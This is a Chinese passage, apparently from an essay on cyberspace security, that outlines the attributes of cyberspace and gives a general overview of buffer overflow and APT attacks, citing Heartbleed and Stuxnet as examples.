1.2.2频谱属性 利用电磁波原理工作的无线电台、移动通信网络等构成了网络空间的频谱属性。 1.2.3逻辑属性 其逻辑属性表现为数据和系统代码,数 字化的特征。 1.2.4社会属性 其社会属性表现为知识和人类活动。 2网络空间安全技术现状与发展趋势 2.1缓冲区溢出攻击手段不断翻新 缓冲区溢出会导致应用程序异常、系统不稳定甚至崩溃危害,最主要的是攻击者不仅仅让程序出错,而且让程序改变其原有的逻辑,转而去执行一些攻击者所期望的恶意代码功能程序,从而窃取控制权进行攻击。如2014年爆发的“心脏出血(HeartBleed)”漏洞,利用该漏洞攻击者可窃取服务器内存当前存储的用户数据。 2.2高级持续性威胁(APT)攻击 APT攻击是指利用先进的攻击手段对特定目标进行长期持续性网络攻击,在发动攻击之前需要对攻击对象的业务流程和目标系统进行精确的收集。主动挖掘被攻击对象受信系统和应用程序的漏洞,利用这些漏洞组建攻击者所需的网络,以达到盗取敏感数据或达到某种目的的攻击。如震网病毒Stuxnet攻击是典型的APT攻击。 2.3软硬件协同网络攻击

相关文档
最新文档